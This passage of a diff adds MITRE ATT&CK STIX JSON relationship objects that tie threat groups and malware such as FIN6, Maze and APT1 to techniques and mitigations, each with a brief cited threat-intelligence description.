April 2016" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has removed files from victim machines.(Citation: FireEye FIN6 April 2016)", + "relationship_type": "uses", + "id": "relationship--56682d47-48ad-4a8c-9f55-124f7cb90e5b", + "type": "relationship", + "modified": "2020-10-19T18:18:50.434Z", + "created": "2020-10-08T20:15:21.359Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "description": "FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.", + "source_name": "FireEye FIN6 April 2016" + } + ], + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\\Windows\\.(Citation: FireEye FIN6 April 2016)", + "relationship_type": "uses", + "id": "relationship--935d1918-a1ea-4c46-b3b0-5c1d0f44a346", + "type": "relationship", + "modified": "2020-10-09T13:01:09.508Z", + "created": "2020-10-09T12:50:42.914Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "external_references": [ + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)", + "relationship_type": "uses", + "id": "relationship--31221040-295a-437a-ac4a-d85e0b5d9122", + "type": "relationship", + "modified": "2020-10-09T13:28:48.189Z", + "created": "2020-10-09T13:28:48.189Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "external_references": [ + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)", + "relationship_type": "uses", + "id": "relationship--b9349020-d0b1-4d48-94f1-74a4f3c79185", + "type": "relationship", + "modified": "2020-10-19T18:18:50.448Z", + "created": "2020-10-09T13:30:46.643Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "malware--432555de-63bf-4f2a-a3fa-f720a4561078", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--01c46868-c510-4df1-93fe-31d1fa9eb62e", + "type": "relationship", + "modified": "2020-10-09T13:41:46.602Z", + "created": "2020-10-09T13:41:46.602Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "external_references": [ + { + "description": "Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.", + "url": "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf", + "source_name": "Visa FIN6 Feb 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has collected schemas and user accounts from systems running SQL Server.(Citation: Visa FIN6 Feb 2019)", + "relationship_type": "uses", + "id": "relationship--23749a96-a086-4e14-b6c1-44bc9c7d99c1", + "type": "relationship", + "modified": "2020-10-09T13:47:23.614Z", + "created": "2020-10-09T13:47:23.614Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "Trend Micro FIN6 October 2019", + "url": "https://www.trendmicro.com/en_us/research/19/j/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops.html", + "description": "Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020." + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used Metasploit Bind and Reverse TCP stagers.(Citation: Trend Micro FIN6 October 2019)", + "relationship_type": "uses", + "id": "relationship--d6cb7440-c39c-4bc2-b30e-5264a7f8753c", + "type": "relationship", + "modified": "2020-10-09T14:23:34.744Z", + "created": "2020-10-09T14:23:34.744Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "source_name": "FireEye FIN6 Apr 2019" + } + ], + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used kill.bat script to disable security tools.(Citation: FireEye FIN6 Apr 2019)", + "relationship_type": "uses", + "id": "relationship--51fa2148-9dba-4479-95d7-8d940511e10e", + "type": "relationship", + "modified": "2020-10-09T15:35:15.414Z", + "created": "2020-10-09T15:35:15.414Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) has stopped SQL services to ensure it can encrypt any database.(Citation: Sophos Maze VM September 2020) ", + "relationship_type": "uses", + "id": "relationship--dcd5b361-b86b-47c7-8ce8-85918e00a224", + "type": "relationship", + "modified": "2020-10-09T16:24:39.921Z", + "created": "2020-10-09T16:24:39.921Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) has created a file named \"startup_vrun.bat\" in the Startup folder of a virtual machine to establish persistence.(Citation: Sophos Maze VM September 2020)", + "relationship_type": "uses", + "id": "relationship--1075f27d-8675-4819-b23b-50d390092c95", + "type": "relationship", + "modified": "2020-10-09T17:02:21.689Z", + "created": "2020-10-09T16:24:39.935Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) has delivered components for its ransomware attacks using MSI files, some of which have been executed from the command-line using msiexec.(Citation: Sophos Maze VM September 2020)", + "relationship_type": "uses", + "id": "relationship--e3fa0df1-d388-4e74-b561-acc5094a8e1b", + "type": "relationship", + "modified": "2020-10-19T16:33:42.066Z", + "created": "2020-10-09T16:24:39.960Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) has created scheduled tasks using name variants such as \"Windows Update Security\", \"Windows Update Security Patches\", and \"Google Chrome Security Update\", to launch [Maze](https://attack.mitre.org/software/S0449) at a specific time.(Citation: Sophos Maze VM September 2020)", + "relationship_type": "uses", + "id": "relationship--a848dadb-f97f-4ded-a28e-a1c9954804a6", + "type": "relationship", + "modified": "2020-10-09T17:02:21.761Z", + "created": "2020-10-09T16:24:40.149Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--d9f7383c-95ec-4080-bbce-121c9384457b", + "target_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", + "external_references": [ + { + "source_name": "Sophos Maze VM September 2020", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020." + } + ], + "description": "[Maze](https://attack.mitre.org/software/S0449) operators have used VirtualBox and a Windows 7 virtual machine to run the ransomware; the virtual machine's configuration file mapped the shared network drives of the target company, presumably so [Maze](https://attack.mitre.org/software/S0449) can encrypt files on the shared drives as well as the local machine.(Citation: Sophos Maze VM September 2020) ", + "relationship_type": "uses", + "id": "relationship--3cd19d07-822d-4efd-9f8c-e5b329f331a5", + "type": "relationship", + "modified": "2020-10-19T13:52:26.219Z", + "created": "2020-10-09T16:24:40.174Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "relationship_type": "mitigates", + "description": "Configure default account policy to enable logging. Manage policies to ensure only necessary users have permissions to make changes to logging policies.", + "id": "relationship--29b03b8f-229b-44a9-a281-6e39edb86844", + "type": "relationship", + "modified": "2020-10-19T16:31:34.811Z", + "created": "2020-10-12T13:52:32.913Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "relationship_type": "subtechnique-of", + "id": "relationship--b6ba4fa6-4b31-4824-9885-882274c62716", + "type": "relationship", + "modified": "2020-10-12T13:52:32.923Z", + "created": "2020-10-12T13:52:32.923Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542", + "target_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "external_references": [ + { + "source_name": "FireEye APT29", + "description": "FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + } + ], + "description": "[APT29](https://attack.mitre.org/groups/G0016) has registered algorithmically generated Twitter handles that are used for C2 by malware, such as [HAMMERTOSS](https://attack.mitre.org/software/S0037).(Citation: FireEye APT29)", + "relationship_type": "uses", + "id": "relationship--53a6a12f-04f2-445b-b733-8392ade1a7e5", + "type": "relationship", + "modified": "2020-10-19T00:26:15.086Z", + "created": "2020-10-12T16:17:34.877Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--93e7968a-9074-4eac-8ae9-9f5200ec3317", + "target_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "relationship_type": "mitigates", + "description": "Limit user access to system utilities such as 'systemctl' or 'systemd-run' to users who have a legitimate need.", + "id": "relationship--dd3eb448-d9b3-4e25-b6ad-3992eee64ea8", + "type": "relationship", + "modified": "2020-10-14T15:20:00.926Z", + "created": "2020-10-12T17:50:31.745Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--987988f0-cf86-4680-a875-2f6456ab2448", + "target_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "relationship_type": "mitigates", + "description": "Restrict read/write access to systemd .timer unit files to only select privileged users who have a legitimate need to manage system services.", + "id": "relationship--2c6c988d-d843-4dc0-82be-b504e3c3a39c", + "type": "relationship", + "modified": "2020-10-14T15:20:00.928Z", + "created": "2020-10-12T17:50:31.748Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--9bb9e696-bff8-4ae1-9454-961fc7d91d5f", + "target_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "relationship_type": "mitigates", + "description": "Limit access to the root account and prevent users from creating and/or modifying systemd timer unit files. ", + "id": "relationship--e8001e2b-a639-458e-98f1-816a58830562", + "type": "relationship", + "modified": "2020-10-14T15:20:00.985Z", + "created": "2020-10-12T17:50:31.750Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "relationship_type": "subtechnique-of", + "id": "relationship--de73c6a8-fd33-469d-b7e4-e4f6edd823b9", + "type": "relationship", + "modified": "2020-10-12T17:50:31.765Z", + "created": "2020-10-12T17:50:31.765Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--d6e88e18-81e8-4709-82d8-973095da1e70", + "target_ref": "attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5", + "external_references": [ + { + "source_name": "FireEye EPS Awakens Part 2", + "description": "Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" + } + ], + "description": "[APT16](https://attack.mitre.org/groups/G0023) has compromised otherwise legitimate sites as staging servers for second-stage payloads.(Citation: FireEye EPS Awakens Part 2)", + "relationship_type": "uses", + "id": "relationship--82bfe762-9468-458e-801a-13387a271521", + "type": "relationship", + "modified": "2020-10-12T19:54:58.627Z", + "created": "2020-10-12T19:54:58.627Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) hijacked FQDNs associated with legitimate websites hosted by hop points.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--c1c2c530-a2d2-4c2f-bcff-ceda0277de59", + "type": "relationship", + "modified": "2020-10-13T01:26:50.637Z", + "created": "2020-10-13T01:26:50.637Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "description": "[APT17](https://attack.mitre.org/groups/G0025) has created profile pages in Microsoft TechNet that were used as C2 infrastructure.(Citation: FireEye APT17)", + "relationship_type": "uses", + "id": "relationship--41ca57db-9736-4adf-ac5d-ea2be2ab4860", + "type": "relationship", + "modified": "2020-10-13T22:33:14.086Z", + "created": "2020-10-13T22:33:14.086Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "external_references": [ + { + "url": "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", + "description": "FireEye Labs/FireEye Threat Intelligence. (2015, May 14). Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. Retrieved January 22, 2016.", + "source_name": "FireEye APT17" + } + ], + "description": "[APT17](https://attack.mitre.org/groups/G0025) has created and cultivated profile pages in Microsoft TechNet. To make profile pages appear more legitimate, [APT17](https://attack.mitre.org/groups/G0025) has created biographical sections and posted in forum threads.(Citation: FireEye APT17)", + "relationship_type": "uses", + "id": "relationship--fd9834dc-0323-408b-b217-3f3aa27b50ac", + "type": "relationship", + "modified": "2020-10-13T22:33:14.133Z", + "created": "2020-10-13T22:33:14.133Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "target_ref": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928", + "external_references": [ + { + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/", + "description": "Dell SecureWorks. (2015, October 7). Suspected Iran-Based Hacker Group Creates Network of Fake LinkedIn Profiles. Retrieved January 14, 2016.", + "source_name": "Dell Threat Group 2889" + } + ], + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created fake LinkedIn profiles that included profile photos, details, and connections.(Citation: Dell Threat Group 2889)", + "relationship_type": "uses", + "id": "relationship--a60c0123-95a3-4409-a60e-354e4237d6cb", + "type": "relationship", + "modified": "2020-10-13T22:37:00.995Z", + "created": "2020-10-13T22:37:00.995Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing hyperlinks to malicious files.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--5bc68652-1d99-4782-80bd-086fc7f8358c", + "type": "relationship", + "modified": "2020-10-14T00:44:35.219Z", + "created": "2020-10-14T00:44:35.219Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing malicious attachments.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--de4ae50a-0561-4d01-885a-eab60008d5eb", + "type": "relationship", + "modified": "2020-10-14T00:44:35.257Z", + "created": "2020-10-14T00:44:35.257Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--6a2e693f-24e5-451a-9f88-b36a108e5662", + "target_ref": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a", + "external_references": [ + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "description": "[APT1](https://attack.mitre.org/groups/G0006) has created email accounts for later use in social engineering, phishing, and when registering domains.(Citation: Mandiant APT1)", + "relationship_type": "uses", + "id": "relationship--9b14bfc1-2c78-4ec9-ad02-aeed6f1cf83e", + "type": "relationship", + "modified": "2020-10-14T00:44:35.270Z", + "created": "2020-10-14T00:44:35.270Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0", + "target_ref": "attack-pattern--34b3f738-bd64-40e5-a112-29b0542bc8bf", + "external_references": [ + { + "source_name": "Unit 42 BackConfig May 2020", + "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/", + "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020." + } + ], + "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.(Citation: Unit 42 BackConfig May 2020)", + "relationship_type": "uses", + "id": "relationship--9319fb2f-88df-4195-a42e-2a6a983a4840", + "type": "relationship", + "modified": "2020-10-14T20:39:49.553Z", + "created": "2020-10-14T20:39:49.553Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31", + "target_ref": "attack-pattern--19bf235b-8620-4997-b5b4-94e0659ed7c3", + "relationship_type": "mitigates", + "description": "Disable unnecessary metadata services and restrict or disable insecure versions of metadata services that are in use to prevent adversary access.(Citation: Amazon AWS IMDS V2)", + "id": "relationship--ac4beabf-1644-4386-b34a-ebfc6e3bd3b0", + "external_references": [ + { + "source_name": "Amazon AWS IMDS V2", + "url": "https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/", + "description": "MacCarthaigh, C. (2019, November 19). Add defense in depth against open firewalls, reverse proxies, and SSRF vulnerabilities with enhancements to the EC2 Instance Metadata Service. Retrieved October 14, 2020." + } + ], + "type": "relationship", + "modified": "2020-10-15T19:39:35.495Z", + "created": "2020-10-14T22:00:11.515Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8f5e8dc7-739d-4f5e-a8a1-a66e004d7063", + "target_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "external_references": [ + { + "source_name": "Cylance Cleaver", + "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", + "url": "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + } + ], + "description": "[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)", + "relationship_type": "uses", + "id": "relationship--7dbfb31d-8ac7-44c5-ad9b-f22e07e95d7e", + "type": "relationship", + "modified": "2020-10-15T00:52:01.922Z", + "created": "2020-10-15T00:52:01.922Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--23b6a0f5-fa95-46f9-a6f3-4549c5e45ec8", + "target_ref": "attack-pattern--212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "external_references": [ + { + "source_name": "McAfee Night Dragon", + "description": "McAfee\u00ae Foundstone\u00ae Professional Services and McAfee Labs\u2122. (2011, February 10). Global Energy Cyberattacks: \u201cNight Dragon\u201d. Retrieved February 19, 2018.", + "url": 